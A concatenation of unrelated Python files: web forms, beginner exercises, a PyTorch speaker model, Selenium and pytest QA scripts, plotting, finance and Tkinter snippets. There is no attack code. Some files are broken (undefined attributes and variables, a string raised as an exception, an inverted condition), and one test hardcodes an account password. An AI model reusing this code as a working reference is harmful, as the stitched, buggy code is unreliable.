from wtforms.validators import DataRequired, ValidationError
from wtforms import validators, widgets
class UserBaseForm(FlaskForm):
"""用户基本信息表单 """
# 个性签名
signature = StringField(
label="个性签名",
validators=[ # 验证器
validators.DataRequired(message="用户名不能为空"),
validators.Length(max=20, min=3, message="个性签名长度必须小于%(max)d且大于%(min)d")
],
description="个性签名",
render_kw={
"class": "input_txt",
"required": "required",
"placeholder": "请输入个性签名"
}
)
# 昵称
nick_name = StringField(
label="昵称",
validators=[
validators.DataRequired('请输入昵称!'),
validators.Length(max=10, min=1, message="昵称长度必须小于%(max)d且大于%(min)d")
],
description="昵称",
render_kw={
"class": "input_txt",
"required": "required",
"placeholder": "请输入昵称"
}
)
# 性别
gender = RadioField(
label="性别",
description="性别",
validators=[
DataRequired()
],
coerce=str,
choices=[
("MAN", '男'), # Male
("WOMAN", '女') # FeMale
],
default="MAN",
render_kw={
"style": "display:inline-flex",
}
)
submit = SubmitField(
'确认',
render_kw={
"class": "btn btn-primary center-block"
}
)
"""修改密码"""
class ModifyPassowrd(FlaskForm):
oldPassword = PasswordField(
label="当前密码",
validators=[ # 验证器
validators.DataRequired(message="密码不能为空"),
# validators.Length(max=20, min=3, message="密码长度必须小于%(max)d且大于%(min)d")
],
render_kw={
"class": "input_txt"
}
)
newPassword = PasswordField(
label="新密码",
validators=[ # 验证器
validators.DataRequired(message="密码不能为空"),
validators.Length(max=16, min=8, message="密码长度必须小于%(max)d且大于%(min)d")
],
render_kw={
"class": "input_txt"
}
)
confirmPassword = PasswordField(
label="重复密码",
validators=[ # 验证器
validators.DataRequired(message="密码不能为空"),
validators.EqualTo('newPassword', message='两次密码不一致')
],
render_kw={
"class": "input_txt"
}
)
submit = SubmitField(
'提交',
render_kw={
"class": "btn btn-primary center-block"
}
)
class UserImg(FlaskForm):
url = FileField(
label="上传头像: ",
validators=[
DataRequired("请上传图片")
],
description="头像"
)
submit = SubmitField(
'提交',
render_kw={
"class": "btn btn-primary center-block"
}
)
|
"""ZKSync API."""
|
__author__ = 'hamid'
from .models import MyUser
from django.contrib.auth.forms import UserCreationForm
class SignUpForm(UserCreationForm):
def __init__(self, *args, **kwargs):
super(UserCreationForm, self).__init__(*args, **kwargs)
for fieldname in ['username', 'password1', 'password2']:
self.fields[fieldname].help_text = None
self.fields['username'].widget.attrs['placeholder'] = 'User Name'
self.fields['first_name'].widget.attrs['placeholder'] = 'First Name'
self.fields['last_name'].widget.attrs['placeholder'] = 'Last Name'
self.fields['password1'].widget.attrs['placeholder'] = 'Password'
self.fields['password2'].widget.attrs['placeholder'] = 'Re-Password'
class Meta:
model = MyUser
fields = ('username', 'first_name', 'last_name',
'password1', 'password2',)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 6 03:07:16 2020
@author: lifecell
"""
'''
Question 1
Write code that asks the user to input a number between 1 and 5 inclusive.
The code will take the integer value and print out the string value. So for
example if the user inputs 2 the code will print two. Reject any input that
is not a number in that range
'''
user_input=int(input("Please enter a number between 1 and 5\n>>>"))
if user_input==1:
print("one")
elif user_input==2:
print("two")
elif user_input==3:
print("three")
elif user_input==4:
print("four")
elif user_input==5:
print("five")
else:
print("Out of range!!!")
'''
Question 2
Repeat the previous task but this time the user will input a string and the
code will ouput the integer value. Convert the string to lowercase first.
'''
user_input=input("Please typein a number between one and five\n>>>")
user_input=user_input.lower()
if user_input=="one":
print(1)
elif user_input=="two":
print(2)
elif user_input=="three":
print(3)
elif user_input=="four":
print(4)
elif user_input=="five":
print(5)
else:
print("Out of range!!!")
'''
Question 3
Create a variable containing an integer between 1 and 10 inclusive. Ask the
user to guess the number. If they guess too high or too low, tell them they
have not won. Tell them they win if they guess the correct number.
'''
num=5
user_input=input("I have a number in mind between 1 and 10, Can you guess it ?\n>>>")
if user_input.isdigit():
user_input=int(user_input)
if user_input==num:
print("Yes!!!!, You guessed the number correctly as ",num)
elif user_input<num and user_input>0:
print("Wrong!!!!! The number you guessed is lesser than number.")
elif user_input>num and user_input<11:
print("Wrong!!!!! The number you guessed is bigger than number.")
else:
print("Number out of bounds")
else:
print("Thats not even an integer")
'''
Question 4
Ask the user to input their name. Check the length of the name. If it is
greater than 5 characters long, write a message telling them how many characters
otherwise write a message saying the length of their name is a secret
'''
name=input("Hey, whats your name ?\n>>>")
len_name=len(name)
if len_name<=5:
print("Your name has ",len_name,"chars")
else:
print("Length of your name is a secret.")
'''
Question 5
Ask the user for two integers between 1 and 20. If they are both greater than
15 return their product. If only one is greater than 15 return their sum, if
neither are greater than 15 return zero
'''
print("Please entre two numbers between 1 and 20\n")
num1=int(input("Number 1 : "))
num2=int(input("Number 2 : "))
if num1>15 and num2>15:
print("The product of the two numbers is ",num1*num2)
elif num1>15 or num2>15:
print("The sum of the two numbers is ",num1+num2)
else:
print(0)
'''
Question 6
Ask the user for two integers, then swap the contents of the variables. So if
var_1 = 1 and var_2 = 2 initially, once the code has run var_1 should equal 2
and var_2 should equal 1.
'''
print("Please entre two numbers\n")
val1=int(input("Number 1 : "))
val2=int(input("Number 2 : "))
print("Entered numbers are val1=",val1," and val2=",val2,end="\n")
swap=val1
val1=val2
val2=swap
#Better way to do is
#val1,val2=val2,val1
print("Post swap val1=",val1," val2=",val2) |
#!/usr/bin/python
import zmq
import json
from keyczar.keys import AesKey
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5099")
file = open('shared_secret.junk')
key = AesKey.Read(file.read())
while True:
data = socket.recv()
data = key.Decrypt(data)
data = json.loads(data)
operation = data['operation']
param1 = data['param1']
param2 = data['param2']
print "Got", data
data2 = json.dumps(data)
data2 = key.Encrypt(data2)
socket.send(data2)
|
start = "Hello, "
name = input("What is your name? ")
end = ". How are you today?"
sentence = start + name + end
print(sentence)
|
import torch
import math
import numpy as np
try:
from . import constants as c
except ValueError:
import constants as c
import torch.nn as nn
from torch.autograd import Function
from torch.nn.functional import pairwise_distance, cosine_similarity
PairwiseDistance = nn.PairwiseDistance
CosineSimilarity = nn.CosineSimilarity
def distance(input1, input2, metric):
if metric == "CosineSimilarity":
return cosine_similarity(input1, input2)
elif metric == "PairwiseDistance":
return pairwise_distance(input1, input2)
else:
raise(RuntimeError(('Distance/Difference Metric Unknown')))
class TripletMarginLoss(Function):
"""Triplet loss function.y
"""
def __init__(self, margin):
super(TripletMarginLoss, self).__init__()
self.margin = margin
# self.pdist = PairwiseDistance(p = 2)
self.pdist = CosineSimilarity()
def forward(self, anchor, positive, negative):
d_p = self.pdist.forward(anchor, positive)
d_n = self.pdist.forward(anchor, negative)
dist_hinge = torch.clamp(self.margin + d_p - d_n, min=0.0)
# loss = torch.sum(dist_hinge)
loss = torch.mean(dist_hinge)
return loss
class ReLU(nn.Hardtanh):
def __init__(self, inplace=False):
super(ReLU, self).__init__(0, 20, inplace)
def __repr__(self):
inplace_str = 'inplace' if self.inplace else ''
return self.__class__.__name__ + ' (' \
+ inplace_str + ')'
def conv3x3(in_planes, out_planes, stride=1):
"3x3 convolution with padding"
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class myResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
super(myResNet, self).__init__()
self.relu = ReLU(inplace=True)
self.inplanes = 64
self.conv1 = nn.Conv2d(1, 64, kernel_size=5, stride=2, padding=2,bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, layers[0])
self.inplanes = 128
self.conv2 = nn.Conv2d(64, 128, kernel_size=5, stride=2, padding=2,bias=False)
self.bn2 = nn.BatchNorm2d(128)
self.layer2 = self._make_layer(block, 128, layers[1])
self.inplanes = 256
self.conv3 = nn.Conv2d(128, 256, kernel_size=5, stride=2, padding=2,bias=False)
self.bn3 = nn.BatchNorm2d(256)
self.layer3 = self._make_layer(block, 256, layers[2])
self.inplanes = 512
self.conv4 = nn.Conv2d(256, 512, kernel_size=5, stride=2, padding=2,bias=False)
self.bn4 = nn.BatchNorm2d(512)
self.layer4 = self._make_layer(block, 512, layers[3])
self.avgpool = nn.AdaptiveAvgPool2d((1, None))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
layers = []
layers.append(block(self.inplanes, planes, stride))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class DeepSpeakerModel(nn.Module):
def __init__(self, embedding_size, num_classes, feature_dim = 64, frame_dim = 32):
super(DeepSpeakerModel, self).__init__()
self.embedding_size = embedding_size
self.model = myResNet(BasicBlock, [3, 3, 3, 3])
num = int(math.ceil(feature_dim/16.0))
self.model.fc = nn.Linear(512 * num, self.embedding_size)
self.model.classifier = nn.Linear(self.embedding_size, num_classes)
def l2_norm(self, input):
input_size = input.size()
buffer = torch.pow(input, 2)
normp = torch.sum(buffer, 1).add_(1e-10)
norm = torch.sqrt(normp)
_output = torch.div(input, norm.view(-1, 1).expand_as(input))
output = _output.view(input_size)
return output
def forward(self, x):
x = self.model.conv1(x)
x = self.model.bn1(x)
x = self.model.relu(x)
x = self.model.layer1(x)
x = self.model.conv2(x)
x = self.model.bn2(x)
x = self.model.relu(x)
x = self.model.layer2(x)
x = self.model.conv3(x)
x = self.model.bn3(x)
x = self.model.relu(x)
x = self.model.layer3(x)
x = self.model.conv4(x)
x = self.model.bn4(x)
x = self.model.relu(x)
x = self.model.layer4(x)
x = self.model.avgpool(x)
x = x.view(x.size(0), -1)
x = self.model.fc(x)
self.features = self.l2_norm(x)
# Multiply by alpha = 10 as suggested in https://arxiv.org/pdf/1703.09507.pdf
alpha=10
self.features = self.features*alpha
return self.features
def forward_classifier(self, x):
features = self.forward(x)
res = self.model.classifier(features)
return res
|
import scrapy.cmdline
def main():
# -o ['json', 'jsonlines', 'jl', 'csv', 'xml', 'marshal', 'pickle']
scrapy.cmdline.execute(['scrapy','crawl','mysina'])
if __name__ == '__main__':
main() |
import os
import math
import scipy
import numpy as np
from astropy.io import ascii
from astropy.io import fits
import matplotlib.pyplot as plt
import matplotlib as mpl
########################################
#~ print "#Give the ObIds in a text-file"
#~ font = {
#~ 'weight' : 'bold',
#~ 'size' : 15}
#~ mpl.rc('font', **font)
#~ mpl.rcParams['axes.linewidth'] = 1.5
#~ mpl.rcParams['axes.labelweight']='bold'
#~ mpl.rcParams['axes.labelsize']='large'
#~ mpl.rcParams['xtick.major.size'] = 4
#~ mpl.rcParams['xtick.major.width'] = 2
#~ mpl.rcParams['ytick.major.size'] = 4
#~ mpl.rcParams['ytick.major.width'] = 2
BAT_LC_data = ascii.read("BAT_LC.qdp", header_start = None, data_start=3)
time_cen = np.array(BAT_LC_data['col1'])
#~ start_times =np.array(BAT_LC_data['col2'])
#~ stop_times =np.array(BAT_LC_data['col3'])
rate_bins =np.array(BAT_LC_data['col2'])
rate_errors =np.array(BAT_LC_data['col3'])
plt.plot(time_cen, rate_bins, '.', color='grey',linestyle='steps-post',markersize=0, markerfacecolor='none', markeredgecolor='grey',lw = 1.0)
# ~ BAT_snr30_bins = ascii.read("BAT_LC_times_snr30.qdp", header_start = None, data_start=0, comment = '#')
# ~ t_mid = BAT_snr30_bins['col1']
# ~ t_s = BAT_snr30_bins['col2']
# ~ t_stop = BAT_snr30_bins['col3']
# ~ rate_bat = BAT_snr30_bins['col4']
# ~ rate_bat_err = BAT_snr30_bins['col5']
#~ last = t_stop
# ~ plt.plot(t_s, rate_bat, '.', color='k',linestyle='steps-post',markersize=0, markerfacecolor='none', markeredgecolor='grey',lw = 1.5)
#~ plt.plot(t_s, rate_bat, yerr=rate_bat_err, fmt='.', color='k',lw = 1.3, markersize=0, linestyle='steps-post', markerfacecolor='none', markeredgecolor='k')
plt.axvline(x=-52.1144, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=-43.4104, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=-4.4344, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=10.9896, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=t_stop[-2], ymin=-10, ymax=10000,ls='dotted')
plt.ylabel(r'Counts $\/$ s$^{-1}$ det$^{-1}$',fontsize= 14 )
#~ plt.legend(numpoints=1,prop={'size':11})
plt.xlabel(r'Time since BAT trigger$\/$(s)',fontsize=14)
plt.show()
|
def plot_gallery(title, images, n_col, n_row):
n = n_col*n_row
plt.figure(figsize=(2. * n_col, 2.26 * n_row))
plt.suptitle(title, size=16)
####!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! shen qi
for i, comp in enumerate(images[:n]):
plt.subplot(n_row, n_col, i + 1)
vmax = max(comp.max(), -comp.min())
plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,
interpolation='nearest',
vmin=-vmax, vmax=vmax)
plt.xticks(())
plt.yticks(())
plt.subplots_adjust(0.01, 0.05, 0.99, 0.93, 0.04, 0.)
plt.show()
|
from setuptools import setup
setup(
name = 'sje',
version = '1.0.0',
description = 'Schema JSON Extractor.',
author = 'Ryan Yuan',
author_email = 'ryan.yuan@outlook.com',
packages = ['sje'],
install_requires = [
'pytest==5.0.0',
'PyYAML==5.1.1',
'sqlparse==0.3.0'
],
entry_points = {
'console_scripts': [
'sje = sje.__main__:main'
]
}
) |
import math
from matrix import Matrix
class GrayscaleMatrix(Matrix):
def __init__(self, width, height, value_type=int):
super().__init__(width, height)
x = 0 if value_type is int else 0.0
self.values = [[x] * height for _ in range(width)]
self.value_type = value_type
def apply_to(self, image):
for x, y in image.coordinates:
gray = self.values[x][y] if self.value_type is int else int(self.values[x][y] * 255)
image.reds[x][y] = image.greens[x][y] = image.blues[x][y] = gray
def luminance(self, x, y):
return self.values[x][y] / 255 if self.value_type is int else self.values[x][y]
def set_luminance(self, x, y, value):
self.values[x][y] = int(value * 255) if self.value_type is int else value
@staticmethod
def from_image(image, value_type=int):
matrix = GrayscaleMatrix(image.width, image.height, value_type)
for x, y in image.coordinates:
red = image.reds[x][y]
green = image.greens[x][y]
blue = image.blues[x][y]
gray = gray_from_rgb(red, green, blue)
matrix.values[x][y] = gray if value_type is int else gray / 255
return matrix
def __getitem__(self, x):
return self.values[x]
def gray_from_rgb(red, green, blue):
return math.floor(0.299 * red + 0.587 * green + 0.114 * blue)
if __name__ == '__main__':
import sys
from color.rgb import RgbColor
color = RgbColor.from_string(sys.argv[1])
gray = gray_from_rgb(color.red, color.green, color.blue)
print(color(RgbColor(gray, gray, gray)))
|
import os,sys, time, re
from main.page.base import BasePage
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from main.page.desktop_v3.inbox_message.pe_inbox_message import *
from main.page.desktop_v3.inbox_message.pe_message_details import *
from random import randint
from utils.etc import *
from utils.function.censorlink import *
class inboxMessageActivity():
def goto_inbox_message(self, driver, site):
inbox_message = InboxMessagePage(driver)
inbox_message.open(site)
print('masuk inbox-message.pl')
#inbox_message_page.check_message_exists()
"""inbox_message.select_filter_unread()
print('masuk filter unread')
time.sleep(5)
inbox_message.select_tab_inbox()
print('masuk tab inbox')
inbox_message.select_tab_archive()
print('masuk tab archive')
inbox_message.select_tab_sent()
print('masuk tab sent')
inbox_message.select_tab_trash()
print('masuk tab trash')"""
def get_list_sent_message(self, driver, site):
list_sent_msg_ID = []
next_list_sent_msg_ID = []
try:
inbox_message = InboxMessagePage(driver)
inbox_message.open(site)
inbox_message.select_tab_sent()
time.sleep(2)
#get list of sent message ID in first page
list_sent_msg = inbox_message.get_list_message()
for i in list_sent_msg:
list_sent_msg_ID.append(i.get_attribute('id'))
#check is next page available
is_next_page_exists = inbox_message.next_button_element()
while is_next_page_exists == 1: #if next page available
inbox_message.click_next_button()
time.sleep(3)
next_list_sent_message = inbox_message.get_list_message()
for i in next_list_sent_message:
list_sent_msg_ID.append(i.get_attribute('id'))
is_next_page_exists = inbox_message.next_button_element()
#endwhile
print('End of inbox page')
print('List of sent message ID has been successfully populated ...')
total = len(list_sent_msg_ID)
print('Total Sent Messages : ' + str(total))
return(list_sent_msg_ID, total)
except NoSuchElementException:
total = len(list_sent_msg_ID)
print('Total Sent Message : ' + str(total))
return(list_sent_msg_ID, total)
def get_list_unread_message(self, driver, site):
try:
inbox_message = InboxMessagePage(driver)
inbox_message.open(site)
list_unread_msg_ID = []
next_list_unread_msg_ID = []
inbox_message.select_tab_inbox()
inbox_message.select_filter_unread()
list_unread_msg = inbox_message.get_list_message()
for i in list_unread_msg:
list_unread_msg_ID.append(i.get_attribute('id'))
#check next page in first page
next = inbox_message.next_button_element()
while next == 1:
inbox_message.click_next_button()
time.sleep(5)
next = inbox_message.next_button_element()
next_list_unread_message = inbox_message.get_list_message()
for i in next_list_unread_message:
list_unread_msg_ID.append(i.get_attribute('id'))
#endwhile
print('End of inbox page')
print('List of unread message ID has been successfully populated ...')
total = len(list_unread_msg_ID)
print('Total Unread Message : ' + str(total))
return(list_unread_msg_ID, total)
except NoSuchElementException:
total = len(list_unread_msg_ID)
print('Total Unread Message : ' + str(total))
return(list_unread_msg_ID, total)
def is_message_received(self, driver, site, msg_ID):
inbox_message = InboxMessagePage(driver)
list_unread_msg_ID, total_list_unread = self.get_list_unread_message(driver, site)
print(list_unread_msg_ID)
msg_received = [] #create list of received message
print('msg_ID : ')
print(msg_ID)
for i in msg_ID:
#print(i)
for j in list_unread_msg_ID:
print('j: ')
#print(j)
if i==j:
msg_received.append(i)
break
else:
pass
print('msg_received :')
for i in msg_received:
print(i)
total_msg_received = len(msg_received)
total_msg_ID = len(msg_ID)
print(str(total_msg_received) + ' out of ' + str(total_msg_ID) + ' message(s) received from previous test flow.')
if total_msg_received == total_msg_ID and total_msg_received!=0:
print('All message is successfully received')
else:
diff = total_msg_ID - total_msg_received #to count how many message that is not received
print(str(diff) + ' message(s) is not received')
#need improvement: Add check all message, archived, and trash
def check_sent_message_status(self, driver, site):
inbox_message = InboxMessagePage(driver)
inbox_message.open(site)
print('----- Cek Inbox Sent Status -----')
self.get_list_sent_message(driver, site)
#print('Total Sent Message = ' + str(total))
#ongoing
def check_message_details(self, driver, site):
flag = 0
inbox_message = InboxMessagePage(driver)
message_details = PageMessageDetails(driver)
inbox_message.open(site)
inbox_message.select_filter_unread()
unread_message, total_unread_message = self.get_list_unread_message(driver, site)
#get index of messages in last page
last_page_message_list = inbox_message.get_list_message()
last_page_message_list_ID = []
for i in last_page_message_list:
last_page_message_list_ID.append(i.get_attribute('id'))
total_last_page_message_list = len(last_page_message_list_ID)
print(last_page_message_list_ID)
inbox_message.click_message(last_page_message_list_ID, total_last_page_message_list)
#check elements in message details
time.sleep(5)
try:
message_details.locate_message_header()
print('Header exists.')
message_details.locate_current_shop()
print('[Your Shop Name] exists.')
message_details.locate_sender_name_header()
message_details.locate_sender_name_small()
print('Sender name exists.')
message_details.locate_textarea()
print('Textarea exists.')
message_details.locate_reply_button()
print('Reply button exists.')
msg_content = message_details.get_message_content()
print(msg_content)
print('----')
print('All component exists.')
except Exception as inst:
print(inst)
message_details.click_back_button()
unread_message_new, total_unread_message_new = self.get_list_unread_message(driver, site)
for i in unread_message_new:
if i==unread_message:
flag = 1
print('CAUTION! ' + str(unread_message) + 'STILL EXISTS IN UNREAD MSG LIST. IT SHOULD HAVE BEEN REMOVED.')
break
else:
pass
if flag!=1:
print('Message has been successfully read')
def test(self):
#get whitelist and blacklist
file_w = open("../../../utils/etc/file_io/whitelist.txt",'r')
file_b = open("../../../utils/etc/file_io/blacklist.txt",'r')
file_whitelist = file_w.read().splitlines()
file_blacklist = file_b.read().splitlines()
file_w.close()
file_b.close()
def is_message_contains_blacklisted_links(self, driver, site, sent_msg_ID, sent_message):
inbox_message = InboxMessagePage(driver)
message_details = PageMessageDetails(driver)
sent_msg_ID = sent_msg_ID[0]
print(sent_msg_ID)
inbox_message.open(site)
inbox_message.select_filter_unread()
unread_message = inbox_message.get_list_message() #get unread message in first page
print(unread_message)
total_unread_message = len(unread_message)
print('break1')
inbox_message.click_message(unread_message, total_unread_message, sent_msg_ID) #click message with ID = sent_msg_ID
print('break2')
time.sleep(3)
#get send message
sent_message = str.split(sent_message)
#get received message
msg_content_small = str.split(message_details.get_message_content_small())
msg_content_small_count = len(msg_content_small)
received_message = str.split(message_details.get_message_content())
received_message = received_message[msg_content_small_count:]
#get whitelist and blacklist
file_w = open('../../../utils/etc/file_io/whitelist.txt','r')
file_b = open('../../../utils/etc/file_io/blacklist.txt','r')
file_whitelist = file_w.read().splitlines()
file_blacklist = file_b.read().splitlines()
file_w.close()
file_b.close()
check_if_link_censored(sent_message, received_message, file_blacklist, file_whitelist) #censored link function
def reply_message(self, driver, site, message_ID):
message_ID = message_ID[0]
inbox_message = InboxMessagePage(driver)
message_details = PageMessageDetails(driver)
reply_message = 'Tokopedia qc test reply message #' + str(randint(0,9999))
inbox_message.select_filter_unread()
message_list = inbox_message.get_list_message()
message_list_ID = []
for i in message_list:
message_list_ID.append(i.get_attribute('id'))
total_message_list = len(message_list_ID)
inbox_message.click_message(message_list_ID, total_message_list, message_ID)
time.sleep(6)
try:
reply_ID_list_before = message_details.get_reply_ID()
except: #if there is no reply in message, list empty
reply_ID_list_before = []
total_reply_ID_list_before = len(reply_ID_list_before)
print('Total reply before: ' + str(total_reply_ID_list_before))
message_details.write_reply(reply_message)
message_details.click_reply_button()
print('reply sent')
time.sleep(8)
reply_ID_list_after = message_details.get_reply_ID()
print(reply_ID_list_after)
total_reply_ID_list_after = len(reply_ID_list_after)
print('Total reply after: ' + str(total_reply_ID_list_after))
diff = total_reply_ID_list_after - total_reply_ID_list_before
print(str(diff) + ' reply is sent.')
if diff > 0:
print('Reply is shown.')
new_reply_ID = reply_ID_list_after[total_reply_ID_list_after-1:total_reply_ID_list_after] #get the last reply in list
return(new_reply_ID, diff) #new reply ID and the number of reply sent
elif diff == 0:
raise('ERROR! Reply is not shown') |
import tensorflow as tf
def inicializar_tensor_array(tensors, session):
for neural in tensors:
for tensor in neural:
session.run(tensor.initializer)
def pad_up_to(t, max_in_dims, constant_values):
s = tf.shape(t)
paddings = [[0, m-s[i]] for (i,m) in enumerate(max_in_dims)]
return tf.pad(t, paddings, 'CONSTANT', constant_values=constant_values)
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var) |
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 25 22:24:38 2020
@author: wanta
"""
# Tkinterライブラリのインポート
import tkinter as tk
import tkinter.ttk as ttk
# webbrowserライブラリのインポート
import webbrowser
BROWSER_EDGE = "Microsoft Edge"
BROWSER_CHROME = "Google Chrome"
BROWSER_IE = "Internet Explorer"
SITE_G = "Google"
SITE_Y = "Youtube"
SITE_T = "Twiiter"
class app(tk.Frame):
def callback(event):
# テキストボックス取得
search_word = txt.get()
# 入力がある場合には検索する
if search_word != "":
# 検索サイトの選択
search_site = combo_search.get()
if search_site == SITE_Y:
# YOUTUBEの検索
url = 'https://www.youtube.com/results?search_query=' + search_word
elif search_site == SITE_T:
# ツイッターの検索
url = 'https://twitter.com/search?q='+ search_word + '&src=typed_query'
else:
# グーグル検索(デフォルト)
url = 'https://www.google.co.jp/search?q=' + search_word
# ブラウザの選択
select_browser = combo.get()
if select_browser == BROWSER_IE:
# IEで検索
webbrowser.get('"c:\program files\internet explorer\iexplore.exe" %s &').open(url)
elif select_browser == BROWSER_CHROME:
# Chromeで検索
webbrowser.get('"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" %s &').open(url)
elif select_browser == BROWSER_EDGE:
# Edgeで検索
webbrowser.get('"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" %s &').open(url)
else:
# マシンのデフォルトブラウザで検索
webbrowser.open(url)
txt.delete(0, tk.END)
def btn():
app.callback
root = tk.Tk()
root.attributes("-topmost", True)
root.title("すぐぐる")
root.geometry("420x60")
label = tk.Label(root, text="")
label.pack()
# ブラウザ選択コンボボックスの作成
combo = ttk.Combobox(root, state='readonly')
# リストの値を設定
combo["values"] = ("",BROWSER_EDGE,BROWSER_IE,BROWSER_CHROME)
combo.current(0)
combo.place(x=10, y=5)
# 検索サイト選択コンボボックスの作成
combo_search = ttk.Combobox(root, state='readonly',width=12)
# リストの値を設定
combo_search["values"] = (SITE_G,SITE_Y,SITE_T)
combo_search.current(0)
combo_search.place(x=160, y=5)
# テキストボックスの作成
txt = tk.Entry(width=55)
txt.place(x=10, y=30)
# 検索ボタンの作成
btn = tk.Button(root, text="検索", command=btn, height=1,width=8)
btn.place(x=350, y=28)
root.bind('<Return>', app.callback)
root.mainloop()
|
from page.account.account_page import AccountPage
from page.account.bankcard_manage_page import BankcardManagePage
from page.account.add_bankcard_page import AddBankcardPage
from page.account.bankcard_info import BankcardInfo
from logic import bankcard_manage_page as bankcard
import allure
import pytest
import random
import time
data = [{'username': 'welly229', 'pwd': 'qwer1234'}]
@allure.feature('銀行卡管理')
@allure.story('編輯銀行卡')
@pytest.mark.parametrize('driver', data, indirect=True)
def test_edit_bankcard(driver):
"""一樣 happy path, 判斷再補上"""
account_page = AccountPage(driver)
bankcard_manage_page = BankcardManagePage(driver)
bankcard_info = BankcardInfo(driver)
bank_name = '平安银行'
bank_account, init_bankcard_count = bankcard.add_bankcard(driver, bank_name=bank_name)
card_after_added = init_bankcard_count + 1
if card_after_added >= 4:
bankcard_manage_page.slide('swipe up')
bankcard_manage_page.click_bankcard_to_my_bankcard_page(bank_account=bank_account)
bankcard_info.input_pwd(pwd=data[0]['pwd'])
bankcard_info.click_confirm_to_update_my_bankcard_info()
bankcard_info.check_edit_bankcard_success_hint()
|
import ModuleDirectory.Module2
print(ModuleDirectory)
ModuleDirectory.Module2.say_hi() |
class GenericComponent:
def __init__(self, name: str):
pass
class Sensor(GenericComponent):
def __init__(self):
super().__init__("Sensor")
class Motor(GenericComponent):
def __init__(self):
super().__init__("Motor") |
'''
Dual share class pairs trading
Viacom Class A and B shares - both refers to the same company, and in fact they both give you ownership in the same underlying firm and in the same underlying firm and the same share of the profits.
Assumption:
- In theory, these two stocks ought to have exacly the same value.
- In practice, because Viacom B share have a larger float, that is there's more shares outstanding, they tend to trade more frequently then Viacon Class A.
So, theres a relationship between these two classes of shares, we might want to try and capitalize on that relationship.
'''
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = 20,10
data = pd.read_excel('finances/data/02_03_Begin.xls', index_col='Date',usecols=['Date','VIA','VIA.B'])
data.head()
#--- Ratio between VIA and VIA.B
data['Ratio'] = data['VIA'] / data['VIA.B']
print('Average Ratio: ', round(data['Ratio'].mean(), 3))
print('Ratio Variation: ', round(data['Ratio'].var(), 3))
data['Ratio'].plot(title='Ratio between Viacon Class A and Class B')
data['MA'] = data['Ratio'].rolling(14).mean()
data['buyVIA'] = data.apply(lambda x: 1 if x['VIA'] < x['MA'] else 0,axis=1)
data['buyVIA.B'] = data.apply(lambda x: 1 if x['VIA.B'] > x['MA'] else 0, axis=1)
def calc_returnLongOnly(data):
via = data['buyVIA'] * (data['VIA'].diff()/ data['VIA'])
via_b = data['buyVIA.B'] * (data['VIA.B'].diff()/data['VIA.B'])
return via + via_b
def calc_returnLongShort(data):
via = data['buyVIA'] * ((data['VIA'].diff()/data['VIA']) - (data['VIA.B'].diff()/data['VIA.B']))
via_b = data['buyVIA.B'] * ((data['VIA.B'].diff()/data['VIA.B']) - (data['VIA'].diff()/data['VIA']))
return via + via_b
data['Return - Long Only'] = calc_returnLongOnly(data)
data['Return - Long/Short'] = calc_returnLongShort(data)
data.head()
# data['Profit - Long Only']
# data['Profit - Long/Short']
|
from evaluation.Nodes.Node import Node
from typing import List, Tuple
from datetime import timedelta, datetime
from base.Event import Event
from base.Formula import Formula, AtomicFormula, TrueFormula
from evaluation.PartialMatch import PartialMatch
from base.PatternStructure import SeqOperator, QItem
from misc.Utils import (
merge,
merge_according_to,
is_sorted,
)
from evaluation.Storage import SortedStorage, UnsortedStorage, DefaultStorage, TreeStorageParameters
class InternalNode(Node):
"""
An internal node connects two subtrees, i.e., two subpatterns of the evaluated pattern.
"""
def __init__(self, sliding_window: timedelta, parent: Node = None, event_defs: List[Tuple[int, QItem]] = None,
left: Node = None, right: Node = None):
